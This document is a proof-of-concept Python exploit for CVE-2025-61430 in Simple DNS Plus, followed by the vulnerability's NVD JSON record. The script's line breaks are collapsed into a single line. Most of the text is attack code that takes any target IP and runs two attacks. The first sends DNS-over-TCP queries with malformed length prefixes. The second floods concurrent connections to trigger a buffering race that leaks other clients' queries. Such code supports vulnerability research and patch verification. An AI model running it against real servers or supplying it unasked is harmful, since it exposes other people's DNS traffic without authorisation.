CVE-2025-61430

#!/usr/bin/env python3 # CVE-2025-61430 PoC - Simple DNS Plus DNS over TCP Information Disclosure # This PoC demonstrates the malformed TCP length prefix attack import socket import struct import time def create_dns_query(domain, query_type='A'): """Create a DNS query packet""" # DNS Header (12 bytes) transaction_id = b'\x00\x01' flags = b'\x01\x00' # Standard query questions = b'\x00\x01' # 1 question answer_rrs = b'\x00\x00' authority_rrs = b'\x00\x00' additional_rrs = b'\x00\x00' # DNS Question section qname = b'' for part in domain.split('.'): qname += struct.pack('B', len(part)) + part.encode() qname += b'\x00' # End of domain name # Query type and class type_a = struct.pack('!H', 1 if query_type == 'A' else 28) # A or AAAA class_in = b'\x00\x01' # IN class return transaction_id + flags + questions + answer_rrs + authority_rrs + additional_rrs + qname + type_a + class_in def exploit_malformed_length_prefix(target_ip, target_port=53): """Exploit with malformed TCP length prefix""" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) try: sock.connect((target_ip, target_port)) # Create DNS query dns_query = create_dns_query('example.com') # Create malformed length prefix (smaller than actual packet) malformed_length = len(dns_query) - 10 # Intentionally smaller length_prefix = struct.pack('!I', malformed_length) # Send malformed request sock.sendall(length_prefix + dns_query) print(f"[+] Sent malformed request with length prefix: {malformed_length}") print(f"[+] Actual packet size: {len(dns_query)}") # Try to receive response sock.settimeout(5) try: response = sock.recv(4096) if response: print(f"[+] Received response: {len(response)} bytes") print("[!] Information disclosure may have occurred") except socket.timeout: print("[-] No response received") except Exception as e: print(f"[-] Error: {e}") finally: sock.close() def exploit_concurrent_leak(target_ip, target_port=53): """Exploit concurrent buffering issue""" socks = [] try: # Establish multiple concurrent connections for i in range(5): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_ip, target_port)) socks.append(sock) # Send normal DNS query dns_query = create_dns_query(f'target{i}.com') length_prefix = struct.pack('!I', len(dns_query)) sock.sendall(length_prefix + dns_query) time.sleep(0.1) # Rapidly send requests to trigger race condition for sock in socks: dns_query = create_dns_query('trigger.com') length_prefix = struct.pack('!I', len(dns_query)) sock.sendall(length_prefix + dns_query) # Attempt to receive leaked data for sock in socks: try: sock.settimeout(2) data = sock.recv(4096) if data and len(data) > 12: print(f"[!] Possible leaked data detected: {len(data)} bytes") except: pass except Exception as e: print(f"[-] Error: {e}") finally: for sock in socks: sock.close() if __name__ == '__main__': import sys if len(sys.argv) < 2: print("Usage: python cve_2025_61430_poc.py <target_ip>") sys.exit(1) target = sys.argv[1] print(f"[*] Targeting: {target}") print("[*] Testing malformed length prefix attack...") exploit_malformed_length_prefix(target) print("\n[*] Testing concurrent leak attack...") exploit_concurrent_leak(target)

{"cve": {"id": "CVE-2025-61430", "sourceIdentifier": "[email protected]", "published": "2025-10-24T15:15:40.703", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper handling of DNS over TCP in Simple DNS Plus v9 allows a remote attacker with querying access to the DNS server to cause the server to return request payloads from other clients. This happens when the TCP length prefix is malformed (len differs from actual packet len), and due to a concurrency/buffering issue, even when the lengths match. A length prefix that is smaller than the actual packet size increases information leakage. In summary, this vulnerability allows an attacker to see DNS queries of other clients."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-350"}]}], "references": [{"url": "https://ma-personal.notion.site/simpledns-vuln?source=copy_link", "source": "[email protected]"}, {"url": "https://www.incognitotgt.me/blog/simpledns-vuln", "source": "[email protected]"}]}}